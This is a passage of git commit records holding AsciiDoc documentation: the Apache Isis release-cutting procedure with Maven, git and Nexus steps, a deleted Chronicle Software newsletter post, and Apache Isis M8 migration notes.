before executing the release we remove any other files.\nStill in the `isis-parent` directory:\n\n[source,bash]\n----\npushd ..\ngit clean -dfx\npopd\n----\n\nTo deploy (upload the artifacts), we use:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn deploy \\\n -Dapache-release \\\n -Dgit\n----\n\nWhen prompted, enter your GPG passphrase.\n(Or, it might be sufficient to add just `-Dgpg.passphrase=\"...\"`)\n\nIMPORTANT: This requires `gpg` v2.1 or later.\n\n\n=== Tag the Release\n\nFinally, tag the release:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit tag $ISISART-$ISISREL\ngit tag $ISISART-$ISISREL-$ISISRC\n----\n\n\n=== Check\/Close Staging Repo\n\nThe `mvn deploy` commands will have uploaded all of the release artifacts into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::release-process\/nexus-staging-0.png[width=\"600px\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::release-process\/nexus-staging-1.png[width=\"600px\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread.\nIn the screenshot above the id is `org.apache.isis-008`.\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository.\nThis will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::release-process\/nexus-staging-2.png[width=\"600px\"]\n\nNexus should start the process of closing the repository.\n\nimage::release-process\/nexus-staging-2a.png[width=\"600px\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::release-process\/nexus-staging-3.png[width=\"600px\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::release-process\/nexus-staging-4.png[width=\"600px\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing.\nSee xref:comguide:ROOT:key-generation.adoc[Key Generation] for more details.\n====\n\n[#reset-revision-property]\n=== Reset `revision` property\n\nAt the beginning of the release process we bumped the version to the release version, ie `$ISISREL`.\nWith the release now deployed we now need to reset the revision back down to the base snapshot, ie `2.0.0-SNAPSHOT`.\n\n[NOTE]\n====\nPreviously we bumped to the next development snapshot.\nHowever, this approach doesn't play well with CI\/CD when Apache Isis is mounted as a git submodule, so instead we always use `2.0.0-SNAPSHOT` for all development work.\n====\n\nTherefore (still in the `isis-parent` directory):\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o -Dreleased -P'!all'\n\npushd ..\/starters\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: resetting version\"\n----\n\n=== Push branch & tag\n\nPush the release branch to origin:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tag:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tags aren't visible locally but can be seen link:https:\/\/github.com\/apache\/isis\/tags[online].\n====\n\n== Update starter apps\n\nFor each starter app, we create a new branch and make the changes there, pushing the branch back if the sanity check passes.\n\n\n* for helloworld, the steps are:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -o\nmvn spring-boot:run\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n\n* for simple app, the steps are almost the same:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -Dmetamodel.lockdown\nmvn -pl webapp test -Dmavendeps.lockdown -B # <.>\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n<.> the -B flag is required to avoid control characters in generated output\n+\nApprove any failed lockdown tests (the mavendeps will fail first time around because the dependencies on Apache Isis itself have just be bumped).\n+\nRepeat, then run the app as a sanity check:\n+\n[source,bash,subs=\"attributes+\"]\n----\nmvn -pl webapp spring-boot:run\n----\n+\nYou could also check the output of the Cucumber tests, under:\n\n** `webapp\/target\/cucumber-reports` and\n** `webapp\/target\/cucumber-html-reports`.\n\n* For both apps, commit any changes and then push the release branch to origin once ok:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit add .\ngit commit -m \"$ISISJIRA - updates to $ISISREL\"\ngit push -u origin $ISISBRANCH\n----\n\n== Preview website\n\nWe also prepare a preview of the next version of the website, then made accessible from link:https:\/\/isis.staged.apache.org[].\n\n* Prerequisites:\n\n** clone the link:https:\/\/github.com\/apache\/isis-site[] repo, alongside the `isis` repo:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit clone https:\/\/github.com\/apache\/isis-site ..\/isis-site\n----\n\n** in the `isis-site` repo, check out the `asf-staging` branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit checkout asf-staging\ngit pull --ff-only\n----\n\n* still in the `isis-site` repo, delete all the files in `content\/` _except_ for the `schema` and `versions` directories:\n+\n[source,bash,subs=\"attributes+\"]\n----\npushd content\nfor a in $(ls -1 | grep -v schema | grep -v versions)\ndo\n rm -rf $a\ndone\npopd\n----\n\n* Back in the `isis` repo's worktree for `master` (as opposed to the `release` worktree, that is), generate the Antora site (from the top-level directory):\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis\n\nsh preview.sh\n----\n\n* Copy the generated Antora site to `isis-site` repo's `contents` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncp -Rf antora\/target\/site\/* ..\/isis-site\/content\/.\n----\n\n* Back in the `isis-site` repo, commit the changes and preview:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit add .\ngit commit -m \"$ISISJIRA : staging changes to website\"\n\nsh preview.sh\n----\n\n* If happy, then push the changes:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin asf-staging -u\n----\n\nWait a minute or two; the site should be available at link:https:\/\/isis.staged.apache.org[] (nb: 'staged', not 'staging').\n\n\n\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n\n=== Start voting thread on dev mailing list\n\nThat is, link:mailto:dev@apache.isis.org[]\n\nThe following boilerplate is for a release of the Apache Isis Core.\nAdapt as required:\n\nUse the following subject, eg:\n\n[source,subs=\"attributes+\"]\n----\n[VOTE] Apache Isis Core release {page-isisrel} RC1\n----\n\nAnd use the following body:\n\n[source,subs=\"attributes+\"]\n----\nI've just cut a new release of the Apache Isis Framework.\n\nThe source code zip artifact has been uploaded to a staging repository on\nhttps:\/\/repository.apache.org, along with its corresponding .asc signature.\n\nIn the source code repo the code has been tagged as isis-{page-isisrel}-RC1;\nsee https:\/\/github.com\/apache\/isis\/tags\n\nTo verify the source code itself, you can use the following commands\n(in an empty directory):\n\n----------------------------------------------------------------\ninclude::partial$verify-process.adoc[]\n----------------------------------------------------------------\n\nYou can then test the helloworld or simpleapp starter apps, see:\nhttps:\/\/isis.staged.apache.org\/comguide\/latest\/verifying-releases.html.\n\nYou can also inspect the website in general, available at:\nhttps:\/\/isis.staged.apache.org.\n\nPlease verify the release and cast your vote.\nThe vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (`{page-isisrel}` or whatever)\n* the release candidate number (`RC1` or whatever)\n* the `NEXUSREPONUM` to the repository id as provided by Nexus earlier (`11xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:comguide:ROOT:verifying-releases.adoc[verify the release].\n\n\n\n\n","old_contents":"= Cutting a Release\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:comguide:ROOT:verifying-releases.adoc[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:comguide:ROOT:post-release-successful.adoc[successful] or an xref:comguide:ROOT:post-release-unsuccessful.adoc[unsuccessful] vote.\n\nApache Isis itself is released in one go, everything is ultimately a child of `isis-parent\/pom.xml` (relative to the link:https:\/\/github.com\/apache\/isis[source code root]).\nThis section details the process for formally releasing this module.\n\nThe subsequent sections describe how other committers can xref:comguide:ROOT:verifying-releases.adoc[verify a release] and how the release manager can then perform xref:comguide:ROOT:post-release-successful.adoc[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:comguide:ROOT:release-process-prereqs.adoc[prerequisites] that must be configured first.\nIn particular, you'll need signed public\/private keys, and the ASF Nexus staging repo inlocal `~\/.m2\/settings.xml` file.\n\nThese release notes using bash command line tools.\nThey should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n== Preparation\n\n=== Obtain Consensus\n\nBefore releasing the framework, ensure there is consensus on the xref:docs:support:mailing-list.adoc[dev mailing list] that this is the right time for a release.\nThe discussion should include confirming the version number to be used, and to confirm content.\n\nThese discussions should also confirm the version number of the module being released.\nThis should be in line with our xref:comguide:ROOT:policies\/versioning-policy.adoc#semantic-versioning[semantic versioning policy].\n\nMake sure you have a JIRA ticket open against which to perform all commits.\nIn most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n=== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released.\nThis will usually be the tip of the origin's `master` branch:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n----\n\n\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files.\nThe parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash,subs=\"attributes+\"]\n.find unapproved\/missing licenses\n----\nmvn clean\n\npushd isis-parent\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=1000 -Dreleased -P'!all'\npopd\n\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done > \/tmp\/rat-qn.txt\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done > \/tmp\/rat-al.txt\n----\n\nNOTE: the parent `pom.xml` in each of these locations has the `apache-rat-plugin` appropriately configured.\n\nThis script runs over all submodules, including non-released modules.\n\nThe command writes out a `target\\rat.txt` for each submodule. missing license notes are indicated using the key `!???`.\nThe `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nOnce you've fixed all issues, run the script again to confirm that all license violations have been fixed.\n\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information.\nWithout appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`.\nThis is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nIt's first necessary to have built the framework locally at least once:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn clean install -o\n----\n\nOnce this is done, capture the missing license information using:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn license:download-licenses\ngroovy scripts\/checkmissinglicenses.groovy\n----\n\nWARNING: this groovy script assumes it is being run from the `isis-parent` directory.\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module.\nThe script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash,subs=\"attributes+\"]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n=== Update and preview website\n\nGenerate the website, ensuring that the config, examples, projdoc (system overview and global index) are all updated:\n\n[source,bash,subs=\"attributes+\"]\n----\nsh preview.sh\n----\n\nCheck for any Asciidoc errors, and fix.\n\n\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit add ..\ngit commit -m \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n== Releasing the Framework\n\n=== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible.\nFor example:\n\n[source,bash,subs=\"attributes+\"]\n----\nexport ISISJIRA=ISIS-9999 # <.>\nexport ISISTMP=\/c\/tmp # <.>\nexport ISISREL={page-isisrel} # <.>\nexport ISISRC=RC1 # <.>\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISART=isis\nenv | grep ISIS | sort\n----\n<.> set to an \"umbrella\" ticket for all release activities.\n(One should exist already, xref:comguide:ROOT:post-release-successful.adoc#create-new-jira[created at] the beginning of the development cycle now completing).\n<.> adjust by platform\n<.> adjust as required\n<.> adjust as necessary if this is not the first attempt to release\n\n\n[IMPORTANT]\n====\nThe branch name is intentionally *not* the same as the eventual tag names (eg `isis-{page-isisrel}`).\n====\n\n\n=== Create a release branch and worktree\n\nThe release is performed on a branch; if we are successful, this branch will be merged back into master.\n\nWe also recommend performing this work in a separate git worktree.\nThe original worktree can stay with the `master` branch and be used for documentation fixes, etc.\n\n* create (but don't checkout) a release branch for the version number being released; eg:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit branch $ISISBRANCH\n----\n\n* Create a worktree for this branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit worktree add ..\/isis-release $ISISBRANCH\n----\n\n* Switch to the new worktree and push the branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-release\ngit push origin $ISISBRANCH -u\n----\n\n* Finally switch to the `isis-parent` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd isis-parent\n----\n\n=== Bump code to `$ISISREL`\n\nSearch through the `.java` files for `{page-isisprev}`, and change to `{page-isisrel}`.\n\n=== Bump projects to `$ISISREL`\n\nWe use `mvn versions:set` to manually bump the release version:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=$ISISREL\nmvn install -o -DskipTests\n\npushd ..\/starters\nmvn versions:set -DnewVersion=$ISISREL\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: bumps version to $ISISREL\"\n----\n\nNOTE: After release, there is a xref:comguide:ROOT:cutting-a-release.adoc#reset-revision-property[similar step at the end] to reset back to `2.0.0-SNAPSHOT`.\n\n\n=== Sanity check\n\nPerform one last sanity check on the codebase.\nDelete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash,subs=\"attributes+\"]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o -Dreleased -P'!all'\n----\n\n[NOTE]\n====\nThe `released` system property is set to only sanity check the modules actually to be released (ignores the incubator modules).\n\nPartly that's because there's no need to check the incubator modules, it's also because the incubator modules require Java 11 (Java 8 is used for everything else)\n====\n\n\n=== Deploy\n\nSince the `<version>` has already been updated, we just use `mvn deploy` to upload the artifacts.\nWe activate the (inherited) `apache-release` profile to bring in the `gpg` plugin for code signing.\n\nThe build creates a zip of the directory, so before executing the release we remove any other files.\nStill in the `isis-parent` directory:\n\n[source,bash]\n----\npushd ..\ngit clean -dfx\npopd\n----\n\nTo deploy (upload the artifacts), we use:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn deploy \\\n -Dapache-release \\\n -Dgit\n----\n\nWhen prompted, enter your GPG passphrase.\n(Or, it might be sufficient to add just `-Dgpg.passphrase=\"...\"`)\n\nIMPORTANT: This requires `gpg` v2.1 or later.\n\n\n=== Tag the Release\n\nFinally, tag the release:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit tag $ISISART-$ISISREL\ngit tag $ISISART-$ISISREL-$ISISRC\n----\n\n\n=== Check\/Close Staging Repo\n\nThe `mvn deploy` commands will have uploaded all of the release artifacts into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::release-process\/nexus-staging-0.png[width=\"600px\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::release-process\/nexus-staging-1.png[width=\"600px\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread.\nIn the screenshot above the id is `org.apache.isis-008`.\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository.\nThis will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::release-process\/nexus-staging-2.png[width=\"600px\"]\n\nNexus should start the process of closing the repository.\n\nimage::release-process\/nexus-staging-2a.png[width=\"600px\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::release-process\/nexus-staging-3.png[width=\"600px\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::release-process\/nexus-staging-4.png[width=\"600px\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing.\nSee xref:comguide:ROOT:key-generation.adoc[Key Generation] for more details.\n====\n\n[#reset-revision-property]\n=== Reset `revision` property\n\nAt the beginning of the release process we bumped the version to the release version, ie `$ISISREL`.\nWith the release now deployed we now need to reset the revision back down to the base snapshot, ie `2.0.0-SNAPSHOT`.\n\n[NOTE]\n====\nPreviously we bumped to the next development snapshot.\nHowever, this approach doesn't play well with CI\/CD when Apache Isis is mounted as a git submodule, so instead we always use `2.0.0-SNAPSHOT` for all development work.\n====\n\nTherefore (still in the `isis-parent` directory):\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o -Dreleased -P'!all'\n\npushd ..\/starters\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: resetting version\"\n----\n\n=== Push branch & tag\n\nPush the release branch to origin:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tag:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tags aren't visible locally but can be seen link:https:\/\/github.com\/apache\/isis\/tags[online].\n====\n\n== Update starter apps\n\nFor each starter app, we create a new branch and make the changes there, pushing the branch back if the sanity check passes.\n\n\n* for helloworld, the steps are:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -o\nmvn spring-boot:run\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n\n* for simple app, the steps are almost the same:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -Dmetamodel.lockdown\nmvn -pl webapp test -Dmavendeps.lockdown -B # <.>\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n<.> the -B flag is required to avoid control characters in generated output\n+\nApprove any failed lockdown tests (the mavendeps will fail first time around because the dependencies on Apache Isis itself have just be bumped).\n+\nRepeat, then run the app as a sanity check:\n+\n[source,bash,subs=\"attributes+\"]\n----\nmvn -pl webapp spring-boot:run\n----\n+\nYou could also check the output of the Cucumber tests, under:\n\n** `webapp\/target\/cucumber-reports` and\n** `webapp\/target\/cucumber-html-reports`.\n\n* For both apps, commit any changes and then push the release branch to origin once ok:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit add .\ngit commit -m \"$ISISJIRA - updates to $ISISREL\"\ngit push -u origin $ISISBRANCH\n----\n\n== Preview website\n\nWe also prepare a preview of the next version of the website, then made accessible from link:https:\/\/isis.staged.apache.org[].\n\n* Prerequisites:\n\n** clone the link:https:\/\/github.com\/apache\/isis-site[] repo, alongside the `isis` repo:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit clone https:\/\/github.com\/apache\/isis-site ..\/isis-site\n----\n\n** in the `isis-site` repo, check out the `asf-staging` branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit checkout asf-staging\ngit pull --ff-only\n----\n\n* still in the `isis-site` repo, delete all the files in `content\/` _except_ for the `schema` and `versions` directories:\n+\n[source,bash,subs=\"attributes+\"]\n----\npushd content\nfor a in $(ls -1 | grep -v schema | grep -v versions)\ndo\n rm -rf $a\ndone\npopd\n----\n\n* Back in the `isis` repo's worktree for `master` (as opposed to the `release` worktree, that is), generate the Antora site (from the top-level directory):\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis\n\nsh preview.sh\n----\n\n* Copy the generated Antora site to `isis-site` repo's `contents` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncp -Rf antora\/target\/site\/* ..\/isis-site\/content\/.\n----\n\n* Back in the `isis-site` repo, commit the changes and preview:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit add .\ngit commit -m \"$ISISJIRA : staging changes to website\"\n\nsh preview.sh\n----\n\n* If happy, then push the changes:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin asf-staging -u\n----\n\nWait a minute or two; the site should be available at link:https:\/\/isis.staged.apache.org[] (nb: 'staged', not 'staging').\n\n\n\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n\n=== Start voting thread on dev mailing list\n\nThat is, link:mailto:dev@apache.isis.org[]\n\nThe following boilerplate is for a release of the Apache Isis Core.\nAdapt as required:\n\nUse the following subject, eg:\n\n[source,subs=\"attributes+\"]\n----\n[VOTE] Apache Isis Core release {page-isisrel} RC1\n----\n\nAnd use the following body:\n\n[source,subs=\"attributes+\"]\n----\nI've just cut a new release of the Apache Isis Framework.\n\nThe source code zip artifact has been uploaded to a staging repository on\nhttps:\/\/repository.apache.org, along with its corresponding .asc signature.\n\nIn the source code repo the code has been tagged as isis-{page-isisrel}-RC1;\nsee https:\/\/github.com\/apache\/isis\/tags\n\nTo verify the source code itself, you can use the following commands\n(in an empty directory):\n\n----------------------------------------------------------------\ninclude::partial$verify-process.adoc[]\n----------------------------------------------------------------\n\nYou can then test the helloworld or simpleapp starter apps, see:\nhttps:\/\/isis.staged.apache.org\/comguide\/latest\/verifying-releases.html.\n\nYou can also inspect the website in general, available at:\nhttps:\/\/isis.staged.apache.org.\n\nPlease verify the release and cast your vote.\nThe vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (`{page-isisrel}` or whatever)\n* the release candidate number (`RC1` or whatever)\n* the `NEXUSREPONUM` to the repository id as provided by Nexus earlier (`11xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:comguide:ROOT:verifying-releases.adoc[verify the release].\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01979b0dd2b6a1f8affa8a9a9acfde0a8bda5d76","subject":"Delete 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Delete 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"= Publishing tens of millions of messages per second\nPeter Lawrey\n:hp-tags: Consulting, News Letter, Case Study\n\nWelcome to our first newsletter from Chronicle giving you updates on developments at Chronicle Software plus tips and case studies around how Chronicle have helped clients to maximise value from their implementation. \n\n=== Case Study\nWe have many examples where we have helped clients who are using our open source software to optimise their solution below is a recent example:-\n\nWe helped a client achieve a 12.5x throughput improvement for Chronicle Queue with minimal changes to their solution going from millions of messages per second to tens of millions of events per second.\n\nA large Petrochemical company engaged us to help with performance issues they were seeing writing market data to our Chronicle Queue. The way they were using queue with an older version was limited to about 3.5 million messages per second (per queue). Rather than use more queues they needed to improve the throughput of each one. After tuning their solution and using the last version of Chronicle Queue, they were able to achieve 8.5 million messages per second from Java. What they really needed was a faster, low level way to write from C++ so we produced a bespoke solution for their use case which achieved 44 million messages per second.\n\nNOTE: This was the throughput just to write the messages and didn\u2019t include their logic.\n\n=== Commercial Update\nDue to ongoing success and growth within the Chronicle business, we have grown our Commercial team recruiting 2 experienced sales and business development professionals Rob Hunt and Andrew Twigg. Rob has over 20 years experience within the financial markets, starting as a hedge fund trader he subsequently moved into software sales successfully selling to both buyside and sellside institutions. Andrew joins us from BGC where he was selling market data to financial institutions across Europe prior to that he worked in various senior sales roles within the financial markets at organisations including Thomson Reuters and Dow Jones.\n\nRob and Andrew in conjunction with Commercial Director Paul Hienkens are here to help you with any enquiries you may have around consulting or licensing our software solutions. \n\nIf you wish to discuss how our Chronicle Software experts can help you or wish to receive ongoing selected updates from Chronicle please contact us mailto:sales@chronicle-software.com[sales@chronicle-software.com]\n\nChronicle Software were founded in 2013 by Peter Lawrey the technical architect behind our software stack, as the company has grown Peter has assembled some of the best Java engineers and subject matter experts in the industry. The company\u2019s heritage is firmly rooted in financial services, our business experts and developers are renowned for their proven track records \n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"016182a4910fbdeba0915fa282d5a1ad44697e8e","subject":"ISIS-3084: mignotes for 'Remove the Notion of mutable Collections'","message":"ISIS-3084: mignotes for 'Remove the Notion of mutable Collections'","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2022\/2.0.0-M8\/mignotes.adoc","new_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2022\/2.0.0-M8\/mignotes.adoc","new_contents":"= Migrating from M7 to M8\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n(This page will be added to as development progresses).\n\n== Programming Model\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| For _Domain Objects_ we had support for (direct) _Collection_ modification (`addTo`, `removeFrom`). \n\nAs this is part of _Restful Object Specification 1.0_, it was implemented for the _RO Viewer_ and also the _WrapperFactory_.\n\nSpecifically REST endpoints (removed):\n----\nDomainObjectResource\n addToSet(...)\n addToList(...)\n removeFromCollection(...)\n---- \nEvents (removed)\n----\nCollectionAddToEvent\nCollectionRemoveFromEvent\n----\n| Has been removed without replacement. (An updated _Restful Object Specification 2.0_ is in preparation.)\n\nIt has proven difficulty to define what an \"execution\" would mean for _Collection_ changes, hence we finally removed that notion.\n\nIn some situations it however makes sense to limit which objects can be *added to* or *removed from* a _Collection_.\nThus, one would make the _Collection_ read only and then define _Actions_ that encapsulate the required business logic.\n\n| `@DomainService.logicalTypeName` deprecated for removal\n| use `@Named` or any other semantics supported by Spring\n+\nBehavioral change: `@DomainService.logicalTypeName` can now be left empty, which is interpreted as _unspecified\/indifferent_ \n\n| `RecreatableDomainObject` interface removed\n| use `ViewModel` interface instead\n\n| `ViewModel.viewModelInit(String memento)` removed\n| use a single (String) argument constructor instead; this will allow Java Records to be used as viewmodels 